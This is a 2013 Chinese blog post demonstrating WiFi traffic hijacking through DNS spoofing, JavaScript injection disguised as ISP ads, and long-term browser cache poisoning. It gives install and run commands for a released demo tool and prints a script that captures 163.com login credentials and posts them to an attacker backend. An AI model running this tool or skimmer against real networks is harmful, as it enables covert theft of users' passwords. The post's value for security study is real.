WiFi流量劫持—— JS脚本缓存投毒 - EtherDream

标签: wifi 流量 劫持 | 发表时间:2013-07-06 19:59 | 作者:EtherDream
出处:

  在上一篇《 WiFi流量劫持—— 浏览任意页面即可中毒》构思了一个时光机原型,让我们的脚本通过HTTP缓存机制,在未来的某个时刻被执行,因此我们可以实现超大范围的入侵了。

  基于此原理,我们用NodeJS来实现一个简单的样例。得益于node强大的IO管理,以及各种封装好的网络模块,我们可以很容易实现这个想法:

  

  • 开启一个特殊的DNS服务:所有域名都解析到我们的电脑上。并把Wifi的DHCP-DNS设置为我们的电脑IP。
  • 之后连上Wifi的用户打开任何网站,请求都将被我们的node服务收到。我们根据http头中的host字段来转发到真正服务器上。
  • 收到服务器返回的数据之后,我们就可以实现网页脚本的注入,并返回给用户了!
  • 当注入的脚本被执行,用户的浏览器将依次预加载各大网站的常用脚本库。我们将其感染,并设置超长的缓存时间。

  于是大功告成!

  

 

 

  为了方便测试和控制,已把整个流程:DNS、HTTP代理、代码分析和注入都使用NodeJS编写,并整合在一起。下面就来测试一下!

  获取Demo: ( https://github.com/EtherDream/closurether

# npm install -g closurether

  运行:

# closurether

  启动成功的话,会输出:

[SYS] local ip: 192.168.1.250
[DNS] running 0.0.0.0:53
[WEB] listening 0.0.0.0:80
[WEB] listening 0.0.0.0:443

  当然,192.168.1.250这是我本地的IP,推荐使用固定的IP地址。

  打开无线路由器-DHCP配置,将主DNS设置为自己的IP,重启路由。到此,你已经控制了整个无线网络的流量了!

  用另一台电脑连上你的wifi:

  

  

  这时会发现,ping任何域名,不出意外的话都会返回你的IP,DNS劫持已发挥作用了!

$ ping www.baidu.com
PING www.baidu.com (192.168.1.250): 56 data bytes
Request timeout for icmp_seq 0

$ ping www.google.com
PING www.google.com (192.168.1.250): 56 data bytes
Request timeout for icmp_seq 0

  

  打开任意网页,一切正常。我们可以在node控制台看到用户访问的每一个请求。

  

  

  当然这时网页上什么效果也没出现。这个Demo毕竟是个间谍程序,怎么可能会有界面呢?

  想看效果的话修改项目里的 asset/inject/extern.js,往里面加一条:

alert('Hello World');

 

  这时再刷新页面,效果出现了!

  

  打开任意网页的源文件,发现其中都注入了我们的脚本内容。为了隐蔽性,这里将注入的脚本伪装成运营商的url,别人还以为是联通宽带插的广告 ^_^

  具体想伪装成什么地址,可以在config.json里配置。

  

  脚本内容正是asset/inject/extern.js文件:

  

  到此,我们已实现把javascript代码注入到WiFi网络的HTTP流量里了!

  下面测试我们的终极目标:能穿越到未来执行的脚本时光机。

  

  前面仔细观察的话,不难发现注入的脚本内容里多出一大堆url,这些正是我们需要让用户预加载并缓存的各大网站脚本。具体原理在上一篇里已经详细讲解了。

  如果想入侵更多的网站,往tool/cache-sniffer/url.txt里添加。运行:

$ phantomjs sniffer.js

  程序将自动更新注入脚本的内容。

  要想预加载并缓存一个脚本很容易,只需new Image().src='...'。当然有少数浏览器不支持,不过ie和chrome都是支持的。尽管js文件并不是一个图片,但仍然会缓存。(不过现在已经换成更标准的createElement / appendChild了,没有任何兼容性问题)

  上一篇文章已说明,为了减少一次请求大量脚本文件消耗的带宽,我们并不返回真正的原始脚本文件,而是一个很小的“桩文件”,用来启动我们的入侵代码,以及恢复原始脚本文件。

  因此这个“桩文件”代码量非常少,区区百来字节而已。例如hao123网站下的某个已被感染了的脚本:

  

  我们创建两个script元素,来加载外网的入侵代码,以及恢复原始脚本代码,使网页能正常运行。注意:原始脚本url后面的?1必不可少,否则又会从缓存里加载被感染的当前脚本,进入死循环。

  使用document.write的好处在于,它创建的脚本是异步加载顺序执行的。所以在原始脚本未加载完之前,后面的脚本不会执行,避免了未定义错误的发生。

  入侵代码的url可以在config.json里hacker_url字段配置。为了保证未来被感染的脚本被唤醒时,能正常调出你的入侵代码,所以选择一个可靠的外网来存放。

  本Demo演示如何入侵并截获网易首页的账号,可以参考代码: http://jslog.sinaapp.com/ad.js

  演示中的代码很简单,仅仅捕捉用户在网易首页上输入的账号和密码而已,然后传给后台保存到数据库里。

var url = location.href;
if (/\.163\.com/i.test(url)) {
function onSubmit() {
post(
NTES.one('#js_loginframe_username').value,
NTES.one('input[type=password]').value
);
}

NTES.one('.ntes-loginframe-btn').addEventListener('click', onSubmit);

NTES.one('input[type=password]').addEventListener('keydown', function(e) {
if (e.keyCode == 13) {
onSubmit();
}
});
}

 

  下面重启电脑,并连上家里的WiFi。(连过KFC的用户回家之后的情况)

      

   这时用户的流量已完全不在我们的可控之中,看我们的脚本是否仍能从沉睡之中唤醒呢?

    

  打开www.163.com,一切正常~

  

  输入用户名密码,一切正常~

  

  似乎并没有感觉到任何的异常。回到我们自己的电脑上来看看,后台的笼子里是否有猎物捕捉到。。。

      

  很好,我们的入侵代码已成功执行,在用户离开了我们的网络之后依旧能够运行!只要登录了我们事先感染过的那些网站,入侵代码都将会被唤醒。

  事实上,只要用户不清空缓存,这段代码终将附着在硬盘缓存里,直到过期。有可能是1个星期,甚至数月的时间。

  所谓一时失足成千古恨莫过于此。一时大意连接了一个wifi热点,不经意间间谍已潜入你的浏览器缓存里。。。

  

  ==============================

  使用NodeJS,我们只需数百行代码就实现了这个想法。当然,简单的同时缺点也是不言而喻的。node只提供了传输层的网络接口,我们无法操作底层网络数据。所以只能使用DNS劫持的方法来获得用户的流量。因此也就产生了一个非常纠结的问题:

  怎样才能确定用户查询的域名是HTTP主机呢?

  由于我们把所有的域名都解析到了自己的电脑上,因此包括其他的网络程序数据也转发到了我们这里。然而我们的node只监听了tcp:80端口,对于其他的端口则是完全忽略的。

  即使我们监听了其他端口,我们也无法把收到的数据转发到真实的服务器 —— 我们根本不知道发到哪个地址上!

   HTTP之所以能实现转发,得益于头部有个host字段;而非HTTP协议,甚至包括HTTPS,我们只能收到一堆二进制数据,然后就不知道的该交给谁了。

  

  此问题虽然无法避免,但也有一定程度的解决方案:

  1.) 事先收集各大网站的域名。之后用户查询的域名在列表里的话,直接返回自己的电脑IP;否则转发给外网DNS。

    当记录足够多的话,我们可以拦截住用户大多数的网站流量。

  但要收集大量的网站域名并不容易,而且仍会有不少的遗漏。因此我们使用更简单的方法:

  

  2.) 仍然将所有的域名解析到自己电脑上,但域名TTL时间很短,几秒后就过期。

    如果在之后的几秒时间里,收到访问这个域名的http请求(host字段是这个域名),那么就认为这个域名是http服务的;

    如果规定时间里没有收到,那么就当做非http服务的域名。当域名ttl过期后,下次再查询这个域名时,就解析到外网真实的服务器IP了。反正不是http协议,收到了也没用。

  3.) 尝试访问前来请求域名的80端口。如果能连接上,就当做是一个Web域名。就返回自己的IP。

 

  目前使用方法3来识别域名。事实上基于DNS的流量劫持还有更大缺陷:

  • 如果用户手工设置的DNS怎么办?比如8.8.8.8的用户就非常多。
  • 不是80端口的网站又如何是好?难道我们要把1~65535的端口都监听吗?
  • 一个网站域名下同时有http和其他服务了,拦截就导致那个服务不可用了。
  • 最麻烦的当属纯IP的网站,那么就完全无法拦截了~

  纠结之处就不再吐槽,不然就永远实现不了我们的想法了,以后再使用node扩展慢慢完善。

  即便面临着不少问题,我们的Demo仍能顺利跑起来 —— 完全按照我们的预想运行!

  

  

  ==============================

  当然,你在想这招也只能获取普通的账号而已,对于https加密的账号就无能为力了。

  的确如此,不过别忘了https网站是如何登陆的呢?是用户在地址栏一个字符一个字符的敲入https...然后回车吗?

   下一篇将演示如何把javascript注入到支付宝网页,并截获用户的账号和密码。


本文链接: http://www.cnblogs.com/index-html/p/wifi_hijack_3.html,转载请注明。

相关 [wifi 流量 劫持] 推荐:

WiFi流量劫持—— 截获支付宝账号 - EtherDream

- - 博客园_EtherDream の 原创空间
  前两篇讲述了长缓存投毒的原理和实现. 用户只要在我们的wifi下随便看个网页,就能植入一堆超长潜伏期的后门脚本.   究其原因,还是因为登陆页面的安全性不够. 明文传输的网页,总是能轻而易举的注入脚本代码,因此存在风险也就不足为奇.   所以在必要的场合使用HTTPS加密传输,就能完全避免这类安全隐患.

WiFi流量劫持—— JS脚本缓存投毒 - EtherDream

- - 博客园_EtherDream の 原创空间
  在上一篇《 WiFi流量劫持—— 浏览任意页面即可中毒》构思了一个时光机原型,让我们的脚本通过HTTP缓存机制,在未来的某个时刻被执行,因此我们可以实现超大范围的入侵了.   基于此原理,我们用NodeJS来实现一个简单的样例. 得益于node强大的IO管理,以及各种封装好的网络模块,我们可以很容易实现这个想法:.

漫谈流量劫持

- - WooYun知识库
在鼠标点击的一刹那,流量在用户系统中流过层层节点,在路由的指引下奔向远程服务器. 这段路程中短兵相接的战斗往往是最激烈的,在所有流量可能路过的节点往往都埋伏着劫持者,流量劫持的手段也层出不穷,从主页配置篡改、hosts劫持、进程Hook、启动劫持、LSP注入、浏览器插件劫持、http代理过滤、内核数据包劫持、bootkit等等不断花样翻新.

流量劫持是如何产生的?

- - FEX 百度 Web 前端研发部
流量劫持,这种古老的攻击沉寂了一段时间后,最近又开始闹的沸沸扬扬. 众多知名品牌的路由器相继爆出存在安全漏洞,引来国内媒体纷纷报道. 只要用户没改默认密码,打开一个网页甚至帖子,路由器配置就会被暗中修改. 攻击还是那几种攻击,报道仍是那千篇一律的砖家提醒,以至于大家都麻木了. 早已见惯运营商的各种劫持,频繁的广告弹窗,大家也无可奈何.

浅谈网站流量劫持防范措施

- - 博客园_EtherDream の 原创空间
  前几天上网打开163首页时,发现页面底部莫名其妙的出现一个边框. 这在以前可是未曾有过的,而且以后也绝不可能会有这么丑陋的设计.   趋于好奇心,立刻在边框上点了右键审查元素. 尼玛,不看不知道,网易首页的HTML何时变得这么劣质了.   没有doctype声明,连title元素都没有. script还是language=JScript风格,这得追溯到多少个世纪前了~ 最劣质的是框架居然还是元素.

WiFi之劫

- 鱼 - 南方周末-热点新闻
被无数时尚青年与商务人士热爱的免费WiFi,正面临一场劫难. 监管部门正打算用安全软件来将非经营性场所上网纳入监管.

微評六家互联网公司抵制流量劫持的联合声明

- - 付亮的竞争情报应用
1、六家公司呼吁有关运营商严格打击流量劫持问题. 分为域名劫持和数据劫持两类,但未说明流量劫持可能实施人,劫持人可能有两类,一是运营商及其授权机构,二是第三方公司. 2、劫持行为侵犯了用户和服务商的利益,声明标题中也用了“违法”字样,可能更有效的渠道不是发布公开声明,而是到主管部门投诉. 3、主管部门是原工信部还是已经划到了国网办,我不知道.

WiFi圈地之战

- Beardnan - 南方周末-热点新闻
大量的数据流量需求摆在面前,3G网络不堪重负,直接导致了中国三大电信运营商对WiFi领域的巨资投入和跑马圈地. 但要找到WiFi的盈利模式,仍是一件艰难的事.

RaspBerry Pi连接WiFi

- - 平凡的世界
推荐 EDUP EP-N8508GS无线网卡 树莓派专用,这个直接免驱,省去很多麻烦事.

流量劫持这种事 不靠求运营商就能用技术解决问题吗?

- - TECH2IPO
有时候你在用手机浏览网页甚至打开 App 的时候(比如打开微信公众号文章或者打开手机淘宝),有时候会出现一个广告弹窗,甚至有时候是运营商自己的流量提醒,这个广告有时候和 App 的内容和类型完全不符,不了解情况的用户很可能会怪罪 App 乱弹广告,也许你真的是怪错人了,你的流量可能被某些机构劫持了.